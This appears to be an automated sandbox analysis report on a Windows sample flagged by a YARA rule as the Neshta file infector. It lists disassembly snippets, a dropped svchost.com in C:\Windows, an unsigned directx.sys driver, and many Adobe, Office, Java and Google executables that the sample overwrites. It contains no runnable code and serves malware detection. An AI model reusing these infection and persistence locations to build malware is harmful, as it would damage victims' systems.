          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_0040DC38 push 004041CCh; ret 1_2_0040DC5C
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_00406CE0 push 00406D36h; ret 1_2_00406D2E
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_0040DCEE push 00404284h; ret 1_2_0040DD14
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_0040DCF0 push 00404284h; ret 1_2_0040DD14
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_0040DCA8 push 0040423Ch; ret 1_2_0040DCCC
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_0040DD60 push 004042F4h; ret 1_2_0040DD84
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_00403D28 push 00403D79h; ret 1_2_00403D71
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_0040DD28 push 004042BCh; ret 1_2_0040DD4C
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_0040DDD0 push 00404364h; ret 1_2_0040DDF4
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_0040DD98 push 0040432Ch; ret 1_2_0040DDBC

          Persistence and Installation Behavior:

          barindex
          Yara detected NeshtaShow sources
          Source: Yara matchFile source: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: vi0EwpbUht.exe PID: 7096, type: MEMORY
          Source: Yara matchFile source: 1.2.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.svchost.com.400000.0.unpack, type: UNPACKEDPE
          Drops PE files with a suspicious file extensionShow sources
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile created: C:\Windows\svchost.comJump to dropped file
          Drops executable to a common third party application directoryShow sources
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile written: C:\ProgramData\Adobe\ARM\S\11357\AdobeARMHelper.exeJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile written: C:\ProgramData\Adobe\ARM\S\1742\AdobeARMHelper.exeJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile written: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exeJump to behavior
          Source: C:\Windows\svchost.comFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exeJump to behavior
          Source: C:\Windows\svchost.comFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeJump to behavior
          Source: C:\Windows\svchost.comFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeJump to behavior
          Source: C:\Windows\svchost.comFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exeJump to behavior
          Source: C:\Windows\svchost.comFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exeJump to behavior
          Source: C:\Windows\svchost.comFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exeJump to behavior
          Source: C:\Windows\svchost.comFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeJump to behavior
          Source: C:\Windows\svchost.comFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
          Source: C:\Windows\svchost.comFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exeJump to behavior
          Source: C:\Windows\svchost.comFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exeJump to behavior
          Source: C:\Windows\svchost.comFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exeJump to behavior
          Source: C:\Windows\svchost.comFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
          Source: C:\Windows\svchost.comFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
          Source: C:\Windows\svchost.comFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exeJump to behavior
          Source: C:\Windows\svchost.comFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exeJump to behavior
          Source: C:\Windows\svchost.comFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exeJump to behavior
          Source: C:\Windows\svchost.comFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
          Source: C:\Windows\svchost.comFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
          Drops executables to the windows directory (C:\Windows) and starts themShow sources
          Source: C:\Windows\explorer.exeExecutable created and started: C:\Windows\svchost.com
          Infects executable files (exe, dll, sys, html)Show sources
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXEJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeSystem file written: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXEJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeSystem file written: C:\Users\user\AppData\Local\Temp\CR_0E027.tmp\setup.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeSystem file written: C:\ProgramData\Adobe\ARM\S\1742\AdobeARMHelper.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exeJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Scans\MpPayloadData\mpuser.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXEJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeSystem file written: C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\Source user\OSE.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeSystem file written: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exeJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeSystem file written: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeSystem file written: C:\ProgramData\Adobe\ARM\S\11357\AdobeARMHelper.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\misc.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\AutoIt3\Uninstall.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeSystem file written: C:\ProgramData\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\vcredist_x86.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaws.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXEJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeSystem file written: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\lync99.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exeJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeSystem file written: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXEJump to behavior
          Sample is not signed and drops a device driverShow sources
          Source: C:\Windows\svchost.comFile created: C:\Windows\directx.sysJump to behavior
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXEJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile created: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exeJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile created: C:\Windows\svchost.comJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXEJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeFile created: C:\Users\user\AppData\Local\Temp\nse728B.tmp\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile created: C:\Users\user\AppData\Local\Temp\CR_0E027.tmp\setup.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile created: C:\ProgramData\Adobe\ARM\S\1742\AdobeARMHelper.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXEJump to dropped file
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeFile created: C:\Users\user\AppData\Local\Temp\nsrAB5E.tmp\System.dllJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exeJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Scans\MpPayloadData\mpuser.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXEJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile created: C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeFile created: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\microsoft shared\Source user\OSE.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile created: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exeJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile created: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile created: C:\ProgramData\Adobe\ARM\S\11357\AdobeARMHelper.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exeJump to dropped file
